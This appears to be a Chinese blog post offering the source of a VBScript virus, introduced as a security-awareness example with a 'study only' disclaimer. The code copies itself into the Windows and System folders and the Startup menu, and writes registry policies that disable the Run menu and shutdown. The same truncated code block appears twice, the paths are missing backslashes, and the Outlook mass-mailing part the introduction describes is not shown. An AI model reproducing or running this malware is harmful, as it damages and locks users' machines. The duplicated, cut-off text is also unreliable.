本文提供了一个VBScript病毒的代码示例,展示了病毒如何复制自身到系统关键位置、修改注册表以限制用户操作,并利用Outlook发送邮件进行传播。了解这些行为有助于提升安全意识和防止恶意软件感染。
此代码会被卡巴斯基杀掉,对于安装卡巴的电脑没有危害,此代码只供参考学习之用,请勿使用在不正当地方。
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")
//分别复制病毒到windows/winnt,system/system32,启动菜单下
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" //禁止“运行”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,&
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")
//分别复制病毒到windows/winnt,system/system32,启动菜单下
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" //禁止“运行”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,&
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
